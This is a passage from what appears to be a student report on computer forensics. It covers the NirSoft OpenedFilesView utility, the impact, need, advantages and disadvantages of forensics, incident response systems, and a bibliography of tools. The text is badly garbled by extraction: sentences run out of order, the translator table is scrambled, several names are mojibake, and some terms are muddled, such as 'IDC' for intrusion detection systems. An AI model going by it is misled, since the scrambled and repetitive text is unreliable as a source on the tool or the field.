on Windows 7/Vista/2008. and Windows 7 (32-bit only!). For more information. This device driver is automatically unloaded from the system when you exit from OpenedFilesView utility. see the remark below. Also. Windows Vista.sys for reading the information about each handle from the kernel memory. this utility can only work if you turn on the driver signing test mode. OpenedFilesView on x64 system There is a separated download for x64 (64-bit) version of OpenedFilesView. There is also a separated version for x64 systems.net System Requirements This utility works properly on Windows 2000. Windows 2003/2008. After filtering non-file handles. OpenedFilesView cannot close files opened by Windows kernel. How does it work? OpenedFilesView uses the NtQuerySystemInformation API to enumerate all handles in the system. it uses a temporary device driver NirSoftOpenedFilesDriver. Windows XP.nirsoft.INTRODUCTION w w w . Page | 33 . Older versions of Windows (NT/9x/ME) are not supported. you must have administrative privilege in order to run this utility. However.

press F5. you can right-click on any file or folder on Windows Explorer. and choose the 'OpenedFilesView' item from the menu. If you run the OpenedFilesView option for a file. or alternatively. it'll display all opened files inside that folder. In order to start using it. and view only the handles of the file or folder that you want to inspect. you can launch OpenedFilesView directly from Windows Explorer.OpenedFilesView. use the Auto Refresh feature (Options -> Auto Refresh -> Every x seconds) in order to automatically refresh the opened files list every 1 . In order to refresh the list of opened files. In order to enable this feature. it'll display all opened handles for that file.10. Explorer Context Menu Starting from version 1. check the 'Enable Explorer Context Menu' under the Options menu.INTRODUCTION Using OpenedFilesView OpenedFilesView doesn't require any installation process or additional DLLs. just run the executable file . Translating OpenedFilesView to Another Language Page | 34 . If you run the OpenedFilesView option for a folder.5 seconds.exe The main window of OpenedFilesView display the list of all files currently opened in your system. After you enable this feature.

In order to change the language of OpenedFilesView. and all translated strings will be loaded from the language file. extract the 'openedfilesview_lng. follow the instructions below: Run OpenedFilesView with /savelangfile parameter: OpenedFilesView.ini will be created in the folder of OpenedFilesView utility.ini'. or move it to another folder. Run OpenedFilesView. After you finish the translation. simply rename the language file. and put it in the same folder that you Installed OpenedFilesView utility. and other strings to other languages. dialog-boxes.35 04/ 20 Page | 35 Version . Language Translated By Dat e 11/ Brazil Portuguese 11/ 20 10 17/ Czech czRoPa 12/ 20 08 Dutch Sander Lambregts 18/ 1. download the appropriate language zip file.exe /savelangfile A file named OpenedFilesView_lng. OpenedFilesView is also available in other languages. dialog-boxes. Translate all menus. If you want to run OpenedFilesView without the translation. In order to do that.INTRODUCTION OpenedFilesView allows you to easily translate all menus. Open the created language file in Notepad or in any other text editor. and string entries to the desired language.

INTRODUCTION 09 17/ Dutch Jan Verheijen 09/ 20 09 01/ French Eric FICHOT 07/ 20 09 22/ French Labbaipierre 07/ 20 06 21/ Galician Xosé Antón Vicente 01/ 20 08 10/ German «Latino» auf WinTotal.40 1.47 Rodríguez 1.45 .de 11/ 20 10 02/ Hungarian Dura Sándor Soft Gasparics 10/ 20 08 02/ Italian Giacomo Margarito 04/ 20 06 Japanese Nardog 15/ 07/ Page | 36 1.

46 .INTRODUCTION 20 06 12/ Korean ±Û¹ú·¹ 04/ 20 09 01/ Persian NAHCI 13 09/ 20 07 11/ Polish Hightower 11/ 20 10 01/ Russian solokot 09/ 20 09 02/ Simplified Chinese renda 09/ 20 09 16/ Simplified Chinese Lewen-²©ÑÅÓîÐù 11/ 20 09 01/ Slovenian 09/ 20 09 Spanish Omi 17/ 1.45 Page | 37 1.

40 1.35 Page | 38 .INTRODUCTION 10/ 20 09 06/ Spanish Paco Fdez 05/ 20 09 22/ Taiwanese »OÆW¦@©M°ê Republic 01/ of Taiwan 20 09 02/ Traditional Chinese µo¹Ú King 07/ 20 09 26/ Thai »ÃÐÊÔ·¸Ôì á¤ÀÙà¢ÕÂÇ 03/ 20 08 09/ Ukrainian Alexander Shpek 10/ 20 09 01/ Valencian vjatv 10/ 20 08 1.

INTRODUCTION COMPUTER FORENSICS IMPACT Page | 39 .

INTRODUCTION The impact of the computer forensics leads to the criminals and the subsequent punishment fro them. The other forms of security devices also include the firewalls. Hence it is required for the company to avail the services of such companies that specialize and expertise in providing the security.Intrusion Detection Systems. To some extent the anti virus software also acts as the security measure. The impact and the result of a successful forensic solution will lead the culprit or the criminal to the court that may provide the punishment. The most popular among the security systems is the usage of the IDC . Suppose in any organization there is a computer crime committed and the data has been lost or there is any theft of the data or secret information. Most of the organizations are taking precautionary measures to install and deploying the security devices. The mandate may be applied in negative if certain types of data are not appropriately protected. anti spy ware etc. In the case if the computer forensics are ignored then that may result in risking the vital clues and the loss of information. Punishment always results in decrement of the crime rate. The basic procedures of the usage of firewalls and the anti spy ware are not sufficient for the purpose of providing the adequate support to the computer system or the data and the information related to the computers. Most of the software reports the security status of the networks. The culprit in the computer crimes can be easily detected and put to trial. It is also possible to hold the organizations to the criminal court if they fail to protect customer data. The will also be increase in the market capitalization for the software like vulnerability assessment etc. It is also possible that the organization may befall in legal wrangles. If the computer forensics is not performed up to the expectations then it is also possible that the forensic evidence may be ruled out as inadmissible in a court of law. That is the organization in case may run afoul of some new laws that require the mandate of regulatory compliance. There are many companies that deal specifically in providing security to the customers or the clientele. then in such a situation the computer forensics can be effectively used for the purpose of tracking the person behind the crime. The International Data Corporation or the IDC reported the market for computer forensics and the software that is provided for the purpose of detecting intrusions that is intrusion detection software will reach a new high. proxies. There are legal impacts as well in regard with the computer forensics. The governments of various countries have taken many initiatives in supporting and upgrading the computer Page | 40 .

There are many laws and legislations to support the computer forensics. The loss caused is dependent upon the sensitivity of the computer data or the information for which the crime has been committed. The main purpose of the computer forensics is to produce evidence in the court that can lead to the punishment of the actual. The people that gain access to the computer systems with out proper authorization should be dealt in. The computer forensics has become vital in the corporate world. The user information is provided in the log files that can be effectively used to produce the evidence in case of any crime a legal manner. Need for Computer Forensics The purpose of computer forensics is mainly due to the wide variety of computer crimes that take place. The computer forensics is also efficient where in the data is stored in a single system for the backup. analysis. For this purpose computer forensics are used as they help in tracking the criminal.INTRODUCTION forensics. Moreover there are many departments run by the government especially for the computer forensics. The forensic science is actually the process of utilizing the scientific knowledge for the purpose of collection. The data theft and the intentional damage of the data in a single system can also be minimized with the computer forensics. There are hardware and software that employ the security measures in order to track the changes and the updating of the data or the information. and most importantly the Page | 41 . The computer forensics is a threat against the wrong doers and the people with the negative mindsets. Also there are many private computer forensic companies that deal in this regard. These departments work in contrast like the police authorities by registering the complaints of the users and the investigating the matter to produce before the court of law. There are various computer crimes that occur on small scale as well as large scale. The need in the present age can be considered as much severe due to the internet advancements and the dependency on the internet. In the present technological advancements it is common for every organization to employ the services of the computer forensics experts. There can be theft of the data from an organization in which case the organization may sustain heavy losses. The network security is an important issue related to the computer world.

INTRODUCTION presentation of the evidence in the court of law. The subject provides in depth knowledge for the understanding of the legal as well as the technical aspects of computer crime. The importance of computer forensics is evident in tracking the cases of the child pornography and email spamming. Page | 42 . The need or the importance of the computer forensics is to ensure the integrity of the computer system. The system with some small measures can avoid the cost of operating and maintaining the security. It is very much useful from a technical stand point. The computer forensics has been efficiently used to track down the terrorists from the various parts of the world. There are many tools that can be used in combination with the computer forensics to find out the geographical information and the hide outs of the criminals. The security personnel deploy the effective measures using the computer forensics. The word forensic itself means to bring to the court. The terrorists using the internet as the medium of communication can be tracked down and their plans can be known. view. The Intrusion Detecting Systems are used for that purpose. The IP address plays an important role to find out the geographical position of the terrorists.

Page | 43 . Computer forensics professional should possess the knowledge of the hardware as well as the software tools that can be utilized for the purpose. There are even qualifications awarded by the council of computer forensics. which is either created or treated by the other application programs. The basics of the computer design and architecture play a prominent role and the expert professional should have a great deal of knowledge about the fundamental software design and implementation. A forensics expert always identifies many possibilities that to get a relevant evidence. formatted versions of data or information. In addition to all the benefits of utilizing the services of the computer forensics. The main task or the advantage from the computer forensic is to catch the culprit or the criminal who is involved in the crime related to the computers. If it is known that the data exists then the alternate formats of the same data or the information can also be recovered. file system or the operating system can be applied to gain the results in the other aspects of the case. This may be required in the cases where the signs or clues of the physical movement are required. software. Some cases may also involve additional information regarding the earlier versions or the method of backups. This is quite often similar from one computer system to the other. The forensics provides the organization with a support and helps them recover their loss. Computer Forensics deals extensively to find the evidence in order to prove the crime and the culprit behind it in a court of law. the professional may also undertake the inspections of the location during on site premises. Asit is a wide topic it has many advantages in it. The computer crime exists in many forms.INTRODUCTION Advantages Computer Forensics Computer forensic is an elaborate topic and requires a vast amount of knowledge. The information of the computer is advantageous in case where the involvement of hardware and software with which forensics expert is familiar. The discovery of the data or the information that can provide vital clues in the prosecution of the criminal is itself a process. Experience of one application.

At last the computer forensics has emerged as important part in the disaster recovery management. The cost of operations is also lower in comparison with the security measures that are applied. A computer forensics professional expert should ensure that computer system that is being dealt with is handled carefully. Most of the organizations some time or the other employs the services of the computer forensics experts. Page | 44 . or even otherwise be compromised by the procedures that are utilized for the purpose of investigating a computer system. The forensics professional must maintain the concern that the data information or the possible evidence is not destroyed. Disadvantages of Computer Forensics Everything that has an advantage obviously has some disadvantages as well. spreadsheets. Since the subject is legalized and there are many laws hence the computer forensic professionals maintain a code of ethics. The important thing and the major advantage regarding the computer forensics is the preservation of the evidence that is collected during the process. timeline and scheduling applications and even the usage of graphical applications. But the disadvantages in case of the computer forensics can be considered as the limitations of the subject. It is the duty of the computer forensics expert to maintain the high standards and the keep in mind the sensitivity of the case and maintain the privacy and secrecy of the data or the information of the client’s interests. damaged. This may happen if the information is necessary to prove the crime and should be produced as the evidence in the court of law in order to prove the crime. The major disadvantage of the computer forensics is the privacy concern. email. The ethicality can be considered as an advantage of the forensics in computer systems.INTRODUCTION The application programs may have different formats also. Some of the application programs include the word processors. It is also possible that some sensitive data or information that is important to the client may be lost in order to find the evidence. It may happen in some cases that the privacy of the client is compromised. There are other disadvantages as well regarding the computer forensics. But in some circumstances it becomes almost impossible for the computer forensics professional to maintain the secrecy of the data or the information. The protection of evidence can be considered as critical.

More over despite some of the limitations of the Computer Forensics the subject is still perceived. Measures should be taken and the care of the professional employed for the computer forensics is a must to avoid any subsequent damage to the computer system. The custody of the data that is acquired as the evidence is the responsibility of the computer forensics team. it may be required that the data or the information is stored in the court. Page | 45 . It is also possible in cases that the operations cost may exceed. The duty of the computer forensics expert is to ensure that justice is delivered as fast as possible so that the inconvenience and the subsequent loss to the organization can be avoided. Also the advantages and the benefits of the subject have wide applications in various situations. During the time case is solved. Due to this reason the business operations may also be affected. It is also important the information that is acquired during the forensic exploration is ethically and legally respected. The evidence that is physically extracted and the relevant evidence should be properly handled as well as protected from later damage that may either mechanical or electromagnetic in nature. In some cases it is also possible that the data is in dispute and neither of the disputing parties can use the data. IT is also possible that the hardware of the computer system is damaged physically. Steps should be taken to minimize the cost. The integrity of the data and the information that is acquired should be preserved.INTRODUCTION There are also the chances of introduction of some malicious programs in the computer system that may corrupt the data at a later stage of time. During the analysis process care should be taken that no possible computer virus is released or introduced in the computer system.

This reduces the task of the system administrator.Incident Response Systems are the software or hardware products that can alert the user about any type of intrusion to the system or the computer network. Some of the important features of Incident Response Systems are discussed below. The response is completely automated. It is done to establish a reasonable plan that can address the security breach. The first among them is Alert Response. The Incident Response Systems lets Page | 46 . Most of the companies or organizations employ the services of Incident Response Systems.INTRODUCTION CONCLUSION In the computer forensics IRS . Because of it an alert is generated whenever there is a violation of security.

The alert is generated the moment it occurs. Incident Response Systems are capable of integration. There are advanced Incident Response Systems which are capable of even detecting any type of intrusions. Same can be done for destination machines to store it in a database. Computer forensics investigators can quickly ascertain the things or events that might have taken place. There are many manual techniques by the usage of which computer forensics professional can tune the intrusion detection systems. The action can be manual or automatic depending upon the preference of computer forensics investigator. Scanning of those applications as well as the ports that are opened is also possible through Incident Response Systems. It is also possible to even quickly identify all those applications that are running over the system or the machine. The automated response of Incident Response Systems can be of the type like to store the volatile information from the source if the source is available to the database. Any malicious activity can be detected immediately and the action can be taken over it. Those events that might have occurred or those that are presently occurring. Incident Response Systems make the analysis of volatile data very easy. There can take the action depending upon the type of intrusion.INTRODUCTION you to respond to those incidents that are over the network or the computer system. It is possible to make them active over a single machine or even a group of machines. It is possible via an IRS to take the action immediately and generate the action based on that information. A large number of monitoring tools can be integrated via the IRS. Page | 47 . For the investigators it can help out in timely as well as an efficient manner. These monitoring tools are useless until an alert is generated. Incident Response Systems can be effective only when intrusion detection systems have already detected some sort of activity. Incident Response Systems is integrated with the software and hardware technologies that can monitor and delivers critical information. It is not affected by any size or type of the event. The use of the IRS will reduce the causes for the computer forensics which may reduce the impact of computer crimes.

INTRODUCTION BIBLIOGRAPHY Page | 48 .

com/ • • • • • • • • • • http://www. iTar http://www.com Page | 49 .Paraben P2 Commander .com www.INTRODUCTION References • • • http://www.Selective file dumper.com www.com www.COFEE / DECAF .computerforensics.com www.com http://www.perlustro.com Perlustro eDiscovery Suite . iSeek.FTK .The Sleuth Kit . iVault.ProDiscover.PTK Forensics .com http://www.com http://www.com www.EnCase .com http://www.iLookIX.Andy Rosen .com www.SMART & Expert Witness.digitalforensics.The Coroner's Toolkit .

Sign up to vote on this title
UsefulNot useful